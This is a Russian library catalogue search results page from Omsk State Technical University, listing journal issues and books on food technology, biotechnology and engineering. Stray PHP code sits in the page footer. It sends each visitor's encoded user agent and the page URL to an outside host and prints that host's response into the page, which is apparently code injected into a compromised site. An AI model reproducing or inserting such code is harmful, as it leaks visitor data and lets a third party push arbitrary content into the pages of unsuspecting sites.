Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

76 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Экстракт")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Вестник Астраханского государственного технического университета. - Журнал, 2013г. № 1
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
2. 
Биотехнология. - Журнал, 2018г. № 1
Оглавление 
  • Максимова, Ю. Г. Биотехнологические подходы к биоремедиации окружающей среды,загрязненной тринитротолуолом / Ю. Г. Максимова, А. Ю. Максимов, В. А. Демаков. - с.9-23. - Библиогр.: с.
    Кл. слова: микроорганизм, биодеградация, нитроредуктаза
  • Дюкова, К. Г. Сравнительный анализ оптимальных условий функционирования штаммов - продуцентов с выраженной аспартазной активностью / К. Г. Дюкова [и др.]. - с.24-34. - Библиогр. в конце ст.
    Другие авторы: Измаилян М. С., Киносян М. А., Давидян Т. С.
    Кл. слова: аспартаза, аспарагиновая кислота, биотрансформация
  • Кудрявцева, О. М. Иммунологическая эффективность и безопасность синтезированных олигодезоксинуклеотидов CpG / О. М. Кудрявцева [и др.]. - с.35-44. - Библиогр. в конце ст.
    Другие авторы: Семакова А. П., Микшис Н. И., Попова П. Ю.
    Кл. слова: адьювант, антиген, сибиреязвенная вакцина
  • Проценко, М. А. Подбор питательных сред для глубинного культивирования дереворазрушающего гриба Daedaleopsis tricolor (Bull.) Bondartsev et Singer / М. А. Проценко, Н. Е. Костина, Т. В. Теплякова. - с.45-51. - Библиогр. в конце ст.
    Кл. слова: мицелий, соединение, антиоксидантная активность
  • Ян, Л. Соматический эмбриогенез и растительная регенерация маньчжурского ясеня (Fraxinus mandshurica Rupr.) / Л. Ян [и др.]. - с.52-61. - Библиогр. в конце ст.
    Другие авторы: Ван Ц., Суханова Е. С., Шен Х. Л.
    Кл. слова: зародыш, регенерация, растение
  • Сидорова, Д. Е. Синтез наночастиц серебра с использованием экстрактов травянистых растений и воздействие наночастиц на бактерии / Д. Е. Сидорова [и др.]. - с.62-71. - Библиогр. в конце ст.
    Другие авторы: Липасова В. А., Надточенко В. А., Баранчиков А. Е.
    Кл. слова: антибактериальная активность, биосинтез, экстракт растений
Держатели документа (Информация об экземплярах) 
3. 
Товаровед продовольственных товаров. - Журнал, 2018г. № 4
Оглавление 
  • Кролевец, А. А. Применение наноструктурированного витамина А при производстве кисломолочных функциональных продуктов питания / А. А. Кролевец [и др.]. - с.6-9. - Библиогр. в конце ст.
    Другие авторы: Мячикова Н. И., Левченко О. В., Глотова С. Г.
    Кл. слова: кефир, ряженка, сметана
  • Шмелева, И. Ю. Перспективы использования дикорастущего сырья Алтайского края для производства винных напитков / И. Ю. Шмелева [и др.]. - с.10-13. - Библиогр. в конце ст.
    Другие авторы: Образцова П. А., Рожнов Е. Д., Школьникова М. Н.
    Кл. слова: арония черноплодная, калина, виноделие
  • Бакин, И. А. Совершенствование технологии переработки ягодного сырья для получения концентрированных настоев / И. А. Бакин, А. С. Мустафина, Л. А. Алксеенко. - с.14-16. - Библиогр. в конце ст.
    Кл. слова: черная смородина, экстрагирование, экстракт
  • Елисеев, М. Н. Системы управления качеством пищевых продуктов, закупаемых для предприятий общественного питания / М. Н. Елисеев, Т. И. Чалых, Е. Ю. Райкова. - с.17-23. - Библиогр. в конце ст.
    Кл. слова: система менеджмента качества, безопасность, риски
  • Рагульцева, Н. Г. Маркетинговое исследование качества питания в студенческой столовой / Н. Г. Рагульцева. - с.30-33. - Библиогр. в конце ст.
    Кл. слова: маркетинговая стратегия, общественное питание, комбинат питания университета
  • Ермолаева, Е. О. Интегрированные системы менеджмента: эволюция развития и современное состояние / Е. О. Ермолаева [и др.]. - с.34-37. - Библиогр. в конце ст.
    Другие авторы: Сурков И. В., Станивукович Д., Мотовилов К. Я.
    Кл. слова: международные стандарты, эволюция менеджмента качества, стандарты и качество
  • Киладзе, А. Б. Нарвал: образ вида / А. Б. Киладзе, О. ф. Чернова. - с.38-42. - Библиогр. в конце ст.
    Кл. слова: экология, морфология, продукция промысла
Держатели документа (Информация об экземплярах) 
4. 
Товаровед продовольственных товаров. - Журнал, 2018г. № 8
Оглавление 
  • Мячикова, Н. И. Свойства наноструктурированного сухого экстракта шиповника и его применение в функциональных продуктах питания / Н. И. Мячикова [и др.]. - с.6-14. - Библиогр. в конце ст.
    Другие авторы: Кролевец А. А., Левченко О. В., Глотова С. Г.
    Кл. слова: экстракт шиповника, метод NTA, продукт питания
  • Молчанова, Е. Н. Фасоль "черный глаз" в производстве начинок из мака / ; Е. Н. Молчанова, М. Г. Шипарева, Аврамчук. - с.15-17. - Библиогр. в конце ст.
    Кл. слова: пищевой мак, ингредиент, качество
  • Гогулина, Е. П. Товарная экспертиза продуктов, вырабатываемых из лососевых рыб / Е. П. Гогулина, Т. Г. Родина. - с.18-26. - Библиогр. в конце ст.
    Кл. слова: фальсификация, товарная экспертиза, импортозамещение
  • Киладзе, А. Б. Косатка: образ вида / А. Б. Киладзе, О. Ф. Чернова. - с.27-31. - Библиогр. в конце ст.
    Кл. слова: промысел, биология, численность
  • Киладзе, А. Б. Зубы нильского крокодила: морфология и товарные свойства / А. Б. Киладзе. - с.32-35. - Библиогр. в конце ст.
    Кл. слова: морфометрия, индекс конфигурации, товароведение
  • Святкина, Л. И. Обеспечение качества и безопасности воды в Иркутском регионе / Л. И. Святкина, Т. Ю. Святкина, В. Я. Андрухова. - с.36-42. - Библиогр. в конце ст.
    Кл. слова: питьевая вода, контроль качества, мониторинг
  • Николаева, М. А. Анализ состояния и перспектив развития Российского рынка ПСП / М. А. Николаева, М. А. Голубцов. - с.43-47. - Библиогр. в конце ст.
    Кл. слова: продукт, спортивное питание, социологический опрос
  • Комкова, Л. В. Правила подтвержения соответствия парфюмерно-косметической продукции / Л. В. Комкова, Л. Г. Елисеева. - с.48-50. - Библиогр. в конце ст.
    Кл. слова: декларирование, сертификация, добровольная сертификация
  • Бутко, О. А. Восточные ароматы - модная тенденция в парфюмерии / О. А. Бутко, Е. А. Братчикова. - с.51-53. - Библиогр. в конце ст.
    Кл. слова: рынок товаров, продукция, известная марка
Держатели документа (Информация об экземплярах) 
5. 
Вестник Астраханского государственного технического университета. - Журнал, 2013г. № 1
Оглавление 
  • Алексанян, И. Ю. Математическое моделирование тепломассопереноса при распылительной сушке растительных экстрактов / И. Ю. Алексанян, Ю. А. Максименко, Ю. С. Феклунова. - с.9-13. - Библиогр. в конце ст. : ил.
    Кл. слова: Моделирование технологических процессов, Сушка, Растительный экстракт
  • Белов, С. В. Оценка степени злоумышленного интереса к различным компонентам объекта защиты / С. В. Белов, Б. Р. Досмухамедов. - с.14-20. - Библиогр. в конце ст. : табл.
    Кл. слова: Угрозы информационной безопасности, Модель злоумышленного воздействия
  • Гордеева, Ю. Л. Стационарные состояния биотехнологических процессов с нелинейной кинетикой роста микроорганизмов. Множественность при заданной величине концентрации субстрата в поступающем потоке / Ю. Л. Гордеева [и др.]. - с.21-28. - Библиогр. в конце ст. : ил.
    Другие авторы: Щербинин М. Ю., Гордеев Л. С., Комиссаров Ю. А.
    Кл. слова: Биотехнология, Нелинейная кинетика, Микробиологический синтез
  • Исмагулова, А. И. Моделирование процесса измерения динамического уровня жидкости в штанговой глубинно-насосной установке на основе средств динамометрирования / А. И. Исмагулова, Н. Г. Романенко. - с.29-37. - Библиогр. в конце ст. : ил.
    Кл. слова: Штанговые глубинно-насосные установки, Динамограмма, Уровень жидкости в скважине
  • Кипер, А. В. Разработка системы поддержки принятия решений руководителя тушения пожара на базе нечеткой нейронной сети ANFIS при пожаре на территории морского порта / А. В. Кипер, Т. С. Станкевич. - с.38-46. - Библиогр. в конце ст. : ил.
    Кл. слова: Система поддержки принятия решений, ANFIS, Нейронная нечеткая система
  • Кревенцов, Е. Г. Модификация расчета матрицы обратной связи по состоянию для линейных многомерных объектов / Е. Г. Кревенцов. - с.47-52. - Библиогр. в конце ст. : ил.
    Кл. слова: Модальное управление, Компенсация нулей, Модификация алгоритма расчета обратной связи
  • Кригер, Л. С. Нечеткая ситуационная сеть для управления движением общественного транспорта / Л. С. Кригер. - с.53-58. - Библиогр. в конце ст. : ил.
    Кл. слова: Нечеткая ситуационная сеть, Общественный транспорт
  • Путилин, С. С. Разработка системы управления холодильной установкой, учитывающей изменения параметров внешней среды / С. С. Путилин. - с.59-64. - Библиогр. в конце ст. : ил.
    Кл. слова: Холодильная установка, Идентификация эксплуатационных параметров
  • Цыкунов, А. М. Робастная система стабилизации для объекта с запаздыванием по состоянию / А. М. Цыкунов. - с.65-73. - Библиогр. в конце ст. : ил.
    Кл. слова: Робастное управление, Вектор состояния
  • Дубровин, В. С. Многоконтурная система стабилизации управляемого генератора / В. С. Дубровин, В. В. Никулин. - с.74-82. - Библиогр. в конце ст. : ил.
    Кл. слова: Генератор, Релейный элемент, Передаточная функция
  • Мыколенко, Д. А. Повышение эффективности взаимодействия группы компьютеров с питающей сетью / Д. А. Мыколенко, Ю. Б. Томашевский. - с.83-89. - Библиогр. в конце ст. : ил.
    Кл. слова: Системный подход, Импульсный источник питания, Коэффициент коррекции мощности
  • Попов, Г. А. Оценка степени приемлемости методов оптимизации для решения задач защиты информации / Г. А. Попов, Е. А. Попова. - с.90-99. - Библиогр. в конце ст. : табл.
    Кл. слова: Задачи защиты информации, Методы оптимизации, Степень приемлемости
  • Шишкин, Н. Д. Системный анализ и алгоритмы расчета комбинированных солнечно-ветровых установок / Н. Д. Шишкин, Е. А. Манченко. - с.100-108. - Библиогр. в конце ст. : ил.
    Кл. слова: Солнечно-ветровые установки
  • Алешкин, В. В. Программная платформа исследования алгоритмов избыточных интегрированных навигационных систем / В. В. Алешкин, А. С. Матвеев, П. Н. Голованов. - с.109-117. - Библиогр. в конце ст. : ил.
    Кл. слова: инерциальный измерительный блок, Спутниковая система, Полунатурное моделирование
  • Барабанова, Е. А. Разработка универсального алгоритма для многокаскадных коммутаторов с параллельной настройкой / Е. А. Барабанова, Н. С. Мальцева, И. О. Барабанов. - с.118-125. - Библиогр. в конце ст. : ил.
    Кл. слова: Многокаскадная коммутационная система, Параллельный поиск, Коммутационный блок
  • Пищин, О. Н. Повышение качества предоставления услуг в подвижных системах радиосвязи / О. Н. Пищин, Е. В. Сергеева. - с.126-132.. - Библиогр. в конце ст.
    Кл. слова: Качество услуг радиосвязи, Затухание уровня поля в помещениях, Сотовая подвижная радиосвязь
  • Сорокин, А. А. Разработка методики определения времени использования канального ресурса для моделирования инфокоммуникационных систем с динамической топологией сети, предназначенных для обслуживания водных путей / А. А. Сорокин. - с.133-143. - Библиогр. в конце ст. : ил.
    Кл. слова: Инфокоммуникационная система, Канальный ресурс, Программный комплекс
  • Ажмухамедов, И. М. Методология моделирования плохоформализуемых слабоструктурированных социотехнических систем / И. М. Ажмухамедов, О. М. Проталинский. - с.144-154. - Библиогр. в конце ст. : ил.
    Кл. слова: Нечеткое когнитивное моделирование, Индекс схожести, Синтез управляющих решений
  • Григорьев, О. В. Управление стратегическими рисками грузового порта с применением имитационного моделирования / О. В. Григорьев, И. О. Бондарева, Э. А. Латыпова. - с.155-162. - Библиогр. в конце ст. : ил.
    Кл. слова: Грузовой порт, Комплексная система управления рисками, Стратегическая карта грузового порта
  • Фионова, Л. Р. Построение модели специалиста в сфере документационного обеспечения управления на основе компетентностного подхода / Л. Р. Фионова. - с.163-173. - Библиогр. в конце ст. : ил.
    Кл. слова: Модель специалиста и обучаемого, Результат обучения, Компетентностный подход
  • Шутова, Т. В. Экономическая интерпретация оптимизаций финансовых средств, выделенных головной организацией смежным предприятием при военно-техническом сотрудничестве / Т. В. Шутова, Ю. А. Комиссаров. - с.174-179. - Библиогр. в конце ст. : ил.
    Кл. слова: Высокотехнологичный комплекс, Блок-схема метода ветвей и границ
  • Большаков, А. А. Разработка модели информационных процессов при синтезе интеллектуальной обучающей системы с учетом психофизических характеристик обучаемых / А. А. Большаков, А. Ю. Маркелов. - с.180-186. - Библиогр. в конце ст. : ил.
    Кл. слова: Комбинированная модель информационных процессов, Интеллектуальная обучающая система, Методика оценки знаний
  • Карпасюк, И. В. Некоторые особенности и тенденции прикладной математической подготовки студентов технического университета, обучающихся по направлениям IT-профиля / И. В. Карпасюк. - с.187-193. - Библиогр. в конце ст. : табл.
    Кл. слова: Прикладная математическая подготовка, Проектный метод, Вычислительная математика
  • Лаптев, В. В. Метод оценивания умений и навыков при обучении программированию / В. В. Лаптев. - с.194-201. - Библиогр. в конце ст. : ил.
    Кл. слова: Обучающая система, Энтропия
  • Мирзабекова, О. В. Программные средства дистанционного обучения теоретической механике: требования и возможные пути реализации / О. В. Мирзабекова, А. В. Хохлов. - с.202-207. - Библиогр. в конце ст. : ил.
    Кл. слова: Дистанционное обучение теоретической механике, Программные средства обучения решению задач, Разборщик формул
  • Сибикина, И. В. Мониторинг качества подготовки выпускника вуза при осуществлении компетентностного подхода / И. В. Сибикина, И. В. Космачёва, Н. В. Давидюк. - с.208-214. - Библиогр. в конце ст. : ил.
    Кл. слова: Мониторинг качества образования, Автоматизированные системы управления вузом
Держатели документа (Информация об экземплярах) 
Полный текст
6. 
Пищевая промышленность. - Журнал, 2010г. № 1
Оглавление 
  • Скрынник, Е. Б. Основные направления развития пищевой и перерабатывающей промышленности на среднесрочную перспективу / Е. Б. Скрынник. - с.4-9
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПИЩЕВАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ
  • Казакова, Е. В. Защитное съедобное покрытие на основе белков / Е. В. Казакова, Л. С. Кузнецова. - с.16-18
    Кл. слова: УПАКОВКА СЪЕДОБНАЯ, ПОКРЫТИЕ СЪЕДОБНОЕ
  • Калошин, Ю. А. Новая классификация фасовочных устройств / Ю. А. Калошин, С. М. Шамшурко. - с.20-21
    Кл. слова: УСТРОЙСТВО фасовочное, ФАСОВКА, ДОЗАТОР жидкости
  • Федотова, О. Б. "Активная упаковка" из полимерных материалов / О. Б. Федотова, Д. М. Мяленко, А. В. Шалаева. - с.22-23
    Кл. слова: ПОЛИМЕР, УПАКОВКА, ПЛЕНКА полиэтиленовая
  • Вельтищев, В. Н. Установка для промывания колпачков / В. Н. Вельтищев, Ю. А. Калошин, С. Г. Токарева. - с.24
  • Гадлгареева, Р. Р. Транспортная логистика как элемент системы качества на предприятиях общественного питания / Р. Р. Гадлгареева, В. В. Касаткин, А. Г. Ларионова. - с.26
    Кл. слова: ЛОГИСТИКА ТРАНСПОРТНАЯ, ПЕРЕВОЗКА ТОВАРА, ПИТАНИЕ ОБЩЕСТВЕННОЕ - ЛОГИСТИКА
  • Пивоваров, В. И. Основные направления обеспечения продовольственной безопасности населения / В. И. Пивоваров. - с.35
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Кретов, И. Т. Влияние концентрирования на аминокислотный состав творожной сыворотки / И. Т. Кретов, В. Ю. Овсянников, С. Л. Панченко. - с.44-45
    Кл. слова: СЫВОРОТКА, КОНЦЕНТРИРОВАНИЕ, АМИНОКИСЛОТА
  • Резго, Г. Я. Сохраняемость пищевых продуктов / Г. Я. Резго. - с.46-48
    Кл. слова: УБЫЛЬ ЕСТЕСТВЕННАЯ, ХРАНЕНИЕ ПИЩЕВЫХ ПРОДУКТОВ, ПОТЕРИ ТОВАРНЫЕ
  • Эм, В. Г. Использование плодоовощного сырья в производстве мармелада / В. Г. Эм, А. А. Сапарбекова, У. Ч. Чоманов. - с.50-51
    Кл. слова: МАРМЕЛАД, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Новый полуфабрикат для пищеконцентратной промышленности. - с.51-52
    Кл. слова: КОНЦЕНТРАТ, ПОЛУФАБРИКАТЫ ягодные, ПОЛУФАБРИКАТЫ фруктовые
  • Гладкова, И. А. Молочно-растительная основа для напитков функционального назначения / И. А. Гладкова, М. Е. Успенская, Л. В. Антипова. - с.54-56
    Кл. слова: ЭКСТРАКТ молочно-РАСТИТЕЛЬНЫЙ, АМАРАНТ, БОБЫ нута
  • Австриевских, А. Н. Новые формы концентратов сладких блюд / А. Н. Австриевских, В. В. Бебенин, В. М. Позняковский. - с.56-57
    Кл. слова: КИСЕЛЬ, КОНЦЕНТРАТ
7. 
Физико-химические основы конструирования и исследования свойств наноразмерных биоструктур [Текст] / ОмГТУ, 2013. - 43 с.
Держатели документа (Информация об экземплярах) 
8. 
Бобренева, Ирина Владимировна. Функциональные продукты питания и их разработка [Текст] / И. В. Бобренева, 2019. - 364, [1] с.
Держатели документа (Информация об экземплярах) 
9. 
Вопросы питания. - Журнал, 2011г. т. 80 № 6
Оглавление 
  • Взаимосвязь изменений показателей перекисного окисления липидов, коэнзима Q 10 и свободных жирных кислот у крыс под влиянием жирового компонента рациона. - с.4-8
  • Токсиколого-гигиеническая характеристика наночастиц серебра, вводимых в желудочно-кишечный тракт крыс. - с.9-18
  • Потолицына, Н. Н. Липидный обмен у подростков - коренных жителей европейского Севера России / Н. Н. Потолицына, А. Ю. Людинина, Е. Р. Бойко. - с.19-22
  • Изучение пищевого поведения потребителей. - с.23-26
  • Ефимочкина, Н. Р. Значение некоторых потенциально патогенных микроорганизмов в возникновении пищевых токсикозов / Н. Р. Ефимочкина, И. Б. Куваева, Ф. С. Флуер. - с.27-34
  • Влияние пшеничных отрубей на обеспеченность организма витаминами. - с.35-42
  • Коденцова, В. М. Требования к качеству витаминов в составе премиксов и пищевых добавок / В. М. Коденцова, О. А. Вржесинская, В. В. Бессонов. - с.43-46
  • Сазонова, О. В. Пищевой статус у больных гемофилией с поражением суставов / О. В. Сазонова, Ю. А. Косякова, И. Л. Давыдкин. - с.47-51
  • Углицких, А. К. Эффективность комплексной системы диетологического обеспечения детей в критических состояниях / А. К. Углицких. - с.52-58
  • Супы в питании человека. - с.59-61
  • Обеспеченность селеном при хронической сердечной недостаточности различной этиологии. - с.62-66
  • Козлова, О. И. Определение методом высокоэффективной хроматографии стероидных сапонинов в биологически активных добавках к пище, содержащих экстракт якорцев стелющихся / О. И. Козлова, О. И. Передеряев, Г. В. Раменская. - с.67-71
  • Новый источник органических форм цинка. - с.72-75
  • Особенности пищевого статуса, антропометрических и клинико-биохимических показателей у профессиональных спортсменов, занимающихся различными видами спорта. - с.76-81
  • Сорокин, П. L-карнитин в детском питании / П. Сорокин. - с.82-83
  • Разгрузочно-диетическая терапия на современном этапе. - с.84
Держатели документа (Информация об экземплярах) 
10. 
Пищевая промышленность. - Журнал, 2009г. № 9
Оглавление 
  • Панфилов, В. А. Разработка образа пищевого предприятия XXI века - необходимое условие систематического развития технологий и техники / В. А. Панфилов. - с.8-10
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЕ
  • Акулич, А. В. Сушка плодоовощного сырья с использованием ИК-излучения / А. В. Акулич, А. В. Темрук. - с.12-13
    Кл. слова: СУШКА инфракрасная, СЫРЬЕ плодоовощное, СУШИЛКА комбинированная
  • Тукачев, В. Е. Устройства нового поколения для резки и сушки макаронных изделий / В. Е. Тукачев, М. В. Калачев, Ю. В. Зуева. - с.14-16
    Кл. слова: РЕЗКА макаронных изделий, СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шуляк, В. А. Обжарочные аппараты малой производительности / В. А. Шуляк, А. В. Булгак. - с.18-21
    Кл. слова: АППАРАТ обжарочный
  • Шкоп, Я. Я. Технология КНП-фриго для производства функциональной пищи / Я. Я. Шкоп. - с.22-23
    Кл. слова: КОНЦЕНТРАТ натуральных продуктов
  • Влияние нанотехнологических добавок морского генеза на свойства эмульсионных продуктов. - с.30-32
    Кл. слова: МАЙОНЕЗ, ПОЛИСАХАРИДЫ, ЭМУЛЬГАТОР
  • Бердутина, А. В. Методика определения эмульсионных свойств белковых препаратов / А. В. Бердутина, А. С. Громов. - с.35-37
    Кл. слова: ПРЕПАРАТ белковый
  • Феофилактова, О. В. Разработка соусов с применением эубиотических микроорганизмов и их метаболитов / О. В. Феофилактова, А. В. Казаков. - с.38-39
    Кл. слова: СОУСЫ
  • Матисон, В. А. Улучшение качества системы управления персоналом / В. А. Матисон. - с.48-49
    Кл. слова: УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Арутюнова, Н. И. Формирование концепции нового продукта питания на основе оценки требований потребителей / Н. И. Арутюнова, В. А. Матисон. - с.50-51
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ
  • Шанин, А. А. Современные высокоэффективные моющие и дезинфицирующие средства для пищевой промышленности / А. А. Шанин, Ю. А. Корнев. - с.52-53
    Кл. слова: СРЕДСТВА МОЮЩИЕ, СРЕДСТВА дезинфицирующие
  • Хасанова, С. Д. Продление сроков хранения помадных конфет / С. Д. Хасанова, З. Г. Скобельская. - с.54-55
    Кл. слова: КОНФЕТЫ, СРОК ХРАНЕНИЯ ПРОДУКТОВ
  • Евдокимова, О. В. Товарные свойства культивируемого женьшеня / О. В. Евдокимова. - с.56-57
    Кл. слова: женьшень
  • Как улучшить качество сметанного продукта?. - с.58-60
    Кл. слова: СМЕТАНА, КАЧЕСТВО ПРОДУКЦИИ
  • Экстракт фукуса для производства продуктов, обогащенных йодом. - с.61
    Кл. слова: фукус, ЙОД - ПИТАНИЕ
  • Жадан, П. В икре самое "лакомое" - антибиотики? / П. Жадан. - с.63
    Кл. слова: ИКРА
  • Бакуменко, О. Е. Принципы разработки функциональных продуктов для студентов / О. Е. Бакуменко, Т. В. Иванникова, Ю. О. Натокина. - с.64-65
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Роль функционального питания в коррекции йоддефицитных состояний. - с.66-68
    Кл. слова: ПИТАНИЕ ФУНКЦИОНАЛЬНОЕ, ПРОДУКТЫ йодированные
11. 
Дроздовский В. Ф. Влияние структуры регенерата на свойства регенерата и качество резин [Текст] / В. Ф. Дроздовский, 1977. - 89, [3] с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3218 - 01.04.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 3.87 с.28 запросов, 4.35c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;